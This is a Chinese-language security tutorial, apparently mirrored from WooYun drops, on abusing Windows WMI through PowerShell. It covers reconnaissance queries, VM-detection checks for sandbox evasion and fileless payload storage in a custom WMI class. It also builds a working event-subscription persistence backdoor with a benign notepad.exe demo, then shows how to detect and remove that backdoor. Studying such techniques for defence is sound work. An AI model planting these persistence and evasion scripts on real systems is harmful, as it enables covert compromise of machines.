WMI Attacks
作者:
·
2015/08/24 10:19
0x00 前言
Matt Graeber在Blackhat中介紹瞭如何使用WMI並展示其攻擊效果,但細節有所保留,所以這一次具體介紹如何透過powershell來實現WMI attacks。
0x01 說明
WMI在內網滲透中最常見的是wmiexec 之前在/tips/?id=7358中有提到 因此Remote WMI不做重點介紹
參考連結: https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor.pdf
https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
0x02 測試環境
作業系統:win8 x32 powershell v3(win8預設安裝) 開啟Winmgmt服務,支援WMI
0x03 WMI attacks
注:以下程式碼均為powershell程式碼
1、偵查
作業系統相關資訊
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_OperatingSystem
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_ComputerSystem
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_BIOS
檔案/目錄列表
Get-WmiObject -Namespace ROOT\CIMV2 -Class CIM_DataFile
磁碟卷列表
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Volume
登錄檔操作
Get-WmiObject -Namespace ROOT\DEFAULT -Class StdRegProv
Push-Location HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Get-ItemProperty OptionalComponents
如圖
當前程式
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Process
列舉服務
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Service
日誌
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_NtLogEvent
登陸賬戶
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_LoggedOnUser
共享
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Share
補丁
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_QuickFixEngineering
防毒軟體
Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
2、虛擬機器檢測
(1)判斷TotalPhysicalMemory和NumberOfLogicalProcessors
$VMDetected = $False
$Arguments = @{
Class = 'Win32_ComputerSystem'
Filter = 'NumberOfLogicalProcessors < 2 AND TotalPhysicalMemory < 2147483648'
}
if (Get-WmiObject @Arguments) {
$VMDetected = $True
"In vm"
}
else{
"Not in vm"
}
(2)判斷虛擬機器程式
$VMwareDetected = $False
$VMAdapter = Get-WmiObject Win32_NetworkAdapter -Filter 'Manufacturer LIKE
"%VMware%" OR Name LIKE "%VMware%"'
$VMBios = Get-WmiObject Win32_BIOS -Filter 'SerialNumber LIKE "%VMware%"'
$VMToolsRunning = Get-WmiObject Win32_Process -Filter 'Name="vmtoolsd.exe"'
if ($VMAdapter -or $VMBios -or $VMToolsRunning)
{ $VMwareDetected = $True
"in vm"
}
else
{
"not in vm"
}
3、儲存payload
【管理員許可權】
$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,
$null)
$StaticClass.Name = 'Win32_EvilClass'
$StaticClass.Put()
$StaticClass.Properties.Add('EvilProperty' , "This is payload")
$StaticClass.Put()
如圖
Tips:
可加密儲存於此位置,執行時解密執行,達到硬碟不存檔案的效果
4、隱蔽定時啟動程式
【管理員許可權】
$filterName = 'BotFilter82'
$consumerName = 'BotConsumer23'
$exePath = 'C:\Windows\System32\notepad.exe'
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE
TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=
$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @
{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=
$WMIEventFilter;Consumer=$WMIEventConsumer}
如圖
每60s執行一次notepad.exe
Tips:
之前在Stuxnet上面就使用了這個後門,透過mof實現
至今該後門方法...還有很多人在用
防毒軟體對此行為也不會查殺...
0x04 WMI後門檢測及清除 :
1、檢視當前WMI Event
【管理員許可權】
#List Event Filters
Get-WMIObject -Namespace root\Subscription -Class __EventFilter
#List Event Consumers
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer
#List Event Bindings
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding
如圖
2、清除後門
【管理員許可權】
#Filter
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='BotFilter82'" | Remove-WmiObject -Verbose
#Consumer
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='BotConsumer23'" | Remove-WmiObject -Verbose
#Binding
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%BotFilter82%'" | Remove-WmiObject -Verbose
如圖
0x05 總結
實現wmi attacks的不止有powershell,比如
– vbs
– mof
– C/C++ via IWbem* COM API
– .NET System.Management classes
檢測方法也有很多,比如檢視日誌
– Microsoft-Windows-WinRM/Operational
– Microsoft-Windows-WMI-Activity/Operational
– Microsoft-Windows-DistributedCOM
甚至禁用Winmgmt服務從根本上阻止該方法的使用
更多wmi attacks的方法歡迎討論。
本文由三好學生原創並首發於烏雲drops,轉載請註明
本文章來源於烏雲知識庫,此映象為了方便大家學習研究,文章版權歸烏雲知識庫!
相關文章
- WMI Defense
- WMI Backdoor
- WSC、JSRAT and WMI BackdoorJS
- XSS Attacks - Exploiting XSS FilterFilter
- 規避技術: WMI
- XDS: Cross-Device Scripting AttacksROSdev
- Seed Lab實驗:Attacks on the TCP ProtocolTCPProtocol
- WMI攻擊與安全防禦
- wmi修改ip返回錯誤值2147942705
- Java安全之JDBC Attacks學習記錄JavaJDBC
- 【backdoor attack】 POISONED FORGERY FACE: TOWARDS BACKDOOR ATTACKS ON FACE FORGERY DETECTION
- 504.3 Password and Access Attacks 密碼和訪問攻擊密碼
- win10系統禁用wmi服務的方法Win10
- 域滲透之利用WMI來橫向滲透
- 《BUSted!!! Microarchitectural Side-Channel Attacks on the MCU Bus Interconnect 》論文分享IDE
- 論文解讀《Neural Cleanse: Identifying and Mitigating Backdoor Attacks in Neural Networks》IDEMIT
- 8.18域橫向smb&wmi明文或hash傳遞
- WPF 已知問題 監聽 WMI 事件導致觸控失效事件
- 警惕國產挖礦木馬CPLMiner利用WMI駐留挖礦
- SEC504.2 Recon, Scanning, and Enumeration Attacks 偵察、掃描和列舉攻擊
- WMI 的攻擊,防禦與取證分析技術之攻擊篇
- WMI 的攻擊,防禦與取證分析技術之防禦篇
- 利用WMI命令入侵挖礦,新型挖礦病毒Audliodg持續活躍中
- 論文泛讀《T-Miner: A Generative Approach to Defend Against Trojan Attacks on DNN-based Text Classification》APPAIDNN
- win10系統中WMI程式佔用cpu使用率高怎麼解決Win10
- 【翻譯】在程式碼指標完整性(CPI)上攻擊的可能性——On the Feasibility of Attacks on Code-Pointer Integrity指標
- 進一步學習WDK驅動程式的SOURCES檔案、WMI驅動程式的mof檔案和wmidata.h標頭檔案